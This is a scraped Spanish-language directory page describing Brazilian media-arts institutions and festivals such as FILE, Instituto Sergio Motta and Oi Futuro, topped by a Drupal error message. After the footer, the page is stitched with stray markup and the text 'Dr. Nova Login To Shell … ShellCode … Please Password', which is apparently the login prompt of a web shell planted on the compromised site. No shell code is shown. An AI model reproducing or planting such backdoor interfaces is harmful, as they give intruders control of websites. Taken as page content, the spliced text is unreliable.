Brasil

Error message

Deprecated function: The each() function is deprecated. This message will be suppressed on further calls in menu_set_active_trail() (line 2292 of /var/www/insularesdivergentes.org/includes/menu.inc).

FILE (Festival Internacional de Lenguaje Electrónico)

País: 
Categorías: 

El Festival Internacional de Lenguaje Electrónico (FILE) se realiza desde el año 2000 y consiste principalmente en una muestra que dura entre cuatro y cinco semanas, de finales de julio a agosto en Sao Paulo, anualmente. La entrada es libre y gratuita para el público asistente.

Departamento en Artes Visuales - USP

País: 
Categorías: 

El Departamento de Artes Visuales de la Escuela de Comunicación y Artes de la Universidad de Sao Paulo tine 25 profesores, de quienes casi la totalidad cuenta con grado de doctor y todos con el de maestría. Tiene carreras de grado y de postgrado con orientación en artes mediales.

Instituto Sergio Motta

País: 
Categorías: 

El Instituto Sergio Motta es una institución que trabaja con tecnología y creatividad. Lleva adelante distintas actividades: el premio Sergio Motta, el Festival Conexiones Tecnológicas, Territorios Recombinantes, Festivales On-line y Simposios.

Itaú Lab

País: 
Categorías: 

Itaú Lab funciona dentro del Instituto Itaú Cultural. Trabaja con arte tecnológico, específicamente con arte y cibernética. El interés está puesto en la interacción como fenómeno poético, no simplemente técnico o lúdico. Realizan distintos tipos de actividades.

MIS (Museo de Imagen y Sonido)

País: 

El Museo de Imagen y Sonido de Sao Paulo fue creado en la década del setenta y tiene una historia muy importante vinculada a los festivales audiovisuales, de cine y del área de música.

NAT (Núcleo Arte y Tecnología)

País: 

El NAT (Núcleo Arte y Tecnología) de la Escuela de Artes Visuales del Parque Lage es un laboratorio medial que desde 2006 cuenta con el apoyo de Oi Futuro.

Oi futuro/ CULTURA

País: 

Esta fundación tiene dos centros de exhibición de obras de arte y tecnología en la ciudad de Río de Janeiro, uno en la ciudad de Belo Horizonte. El ingreso a todos los centros y exhibiciones es libre y gratuito. La sede principal está en Flamengo, en el centro de la ciudad de Río.

Subscribe to RSS - Brasil
<xmp><body></xmp><xmp></body></html></xmp>Dr. Nova Login To Shell

Dr. Nova ShellCode
| Please Password |